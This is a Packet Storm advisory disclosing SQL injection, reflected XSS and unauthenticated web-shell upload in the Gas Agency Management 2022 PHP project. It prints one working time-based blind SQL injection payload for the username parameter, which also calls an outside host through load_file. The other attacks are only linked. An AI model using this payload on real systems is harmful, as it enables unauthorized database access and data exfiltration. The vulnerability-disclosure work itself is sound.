Lucene search

K
packetstormNu11secur1tyPACKETSTORM:168067
HistoryAug 12, 2022 - 12:00 a.m.

Gas Agency Management 2022 SQL Injection / XSS / Shell Upload

2022-08-1200:00:00
nu11secur1ty
packetstormsecurity.com
360
gas agency management
mayuri k
sql injection
unauthenticated file upload
xss
web shell upload
termination
vulnerability
deprecated
`## Title: Gas Agency Management-2022 by Mayuri K - SQLi+FU-RCE+XSS  
## Author: nu11secur1ty  
## Date: 08.12.2022  
## Vendor Homepage: https://www.mayurik.com/#download_section  
## Software Link-0:  
https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html  
## Software Link-1:  
https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022/Docs/gasmark.zip  
  
  
## Description:  
The Gas Agency Management-2022 by Mayuri K suffers from multiple  
vulnerabilities, which means this project must be deprecated  
immediately!  
  
1. - SQLi: the parameter username is vulnerable to time-based blind  
(query SLEEP) injection - not sanitizing well.  
2. - Unauthenticated file upload - not sanitizing upload function -  
possible to upload .php extension files on photo section, for the  
customers.  
3. - XSS-reflected in the section adds customer in address function.  
4. - Web shell file upload - unauthenticated extension file upload, in  
this case, is PHP web shell uploader. After this, the malicious user  
can execute the already uploaded file remotely, and he can destroy  
completely this flawed system.  
5. - STATUS: For termination of the project.  
  
[+]Payloads:  
  
```mysql  
---  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=mxiusQzi'+(select  
load_file('\\\\alzg6yrkl2xieezgaz9zqnya91fu3lw9ncb4yumj.tupaciganka.com\\jfe'))+''  
AND (SELECT 9964 FROM (SELECT(SLEEP(5)))bVfa)--  
FygL&password=r8H!r2a!U2&login=  
---  
```  
[+]Unauthenticated Upload:  
- - - in the video:https://streamable.com/opqz3n  
  
[+]XSS-Reflected:  
- - - in the video:https://streamable.com/opqz3n  
  
[+]RCE:  
- - - in the video:https://streamable.com/opqz3n  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)  
  
## Proof and Exploit:  
[href](https://streamable.com/opqz3n)  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html and https://www.exploit-db.com/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`